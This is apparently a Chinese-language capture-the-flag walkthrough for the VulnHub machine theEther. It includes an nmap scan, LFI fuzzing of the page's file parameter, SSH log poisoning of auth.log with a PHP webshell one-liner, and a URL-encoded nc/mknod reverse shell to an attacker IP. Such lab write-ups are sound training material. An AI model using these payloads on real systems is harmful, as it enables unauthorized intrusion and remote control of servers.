一、靶机配置
1、靶机下载地址
https://download.vulnhub.com/theether/theEther_1.0.1.zip
2、靶机默认为桥接改为net
二、Web渗透测试
1、靶机IP扫描
2、进行靶机端口服务扫描
nmap -sV -p- -A -Pn 192.168.31.141
3、对靶机进行目录扫描
4、访问靶机IP
查看页面功能点,发现一个很可能存在文件包含的点
4、利用burp批量测试存在什么文件包含
github路径地址(LFI-Jhaddix.txt)
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
下载完成
利用burl抓包
发送到intruder模块,利用下载的路径进行爆破
发现结果有几条不一样,拼接访问
拼接/var/log/lastlog,可以访问但是没什么用
/var/log/auth.log 重定向回了首页(注意这个URL)
查看/var/log/auth.log时重定向回首页,说明应该隐藏了什么东西,我们抓包查看一下响应数据包
确实存在
4、SSHgetshell
auth.log文件是我们尝试连接服务器时生成日志。那么就可以利用这个功能,发送恶意PHP代码将恶意代码作为新日志自动添加到auth.log文件中。先看一下phpinfo是否能成功利用
ssh '<?php phpinfo();?>'@192.168.31.142
既然ssh的操作可以被记录到日志中,那么可以尝试是否能够通过日志注入+文件包含来执行任意命令尝试注入一段php代码
1、先写入php一句话木马:
ssh '<?php system($_GET[cmd]);?>'@192.168.1.13(不能用双引号,并且?php中间不能有空格)
2、执行webshell
curl -is 'http://192.168.1.13/index.php?file=/var/log/auth.log&cmd=ls'
既然可以执行任意命令,我们尝试一下反弹一个持久化的shell,NC不能使用-e选项时使用以下反弹语句:
curl -is 'http://192.168.31.142/index.php?file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+192.168.1.7+9999+0%3Cbackpipe+%7C+%2Fbin%2Fbash+1%3Ebackpipe'
注意:这里需要进行下url编码,不然会报错
成功反弹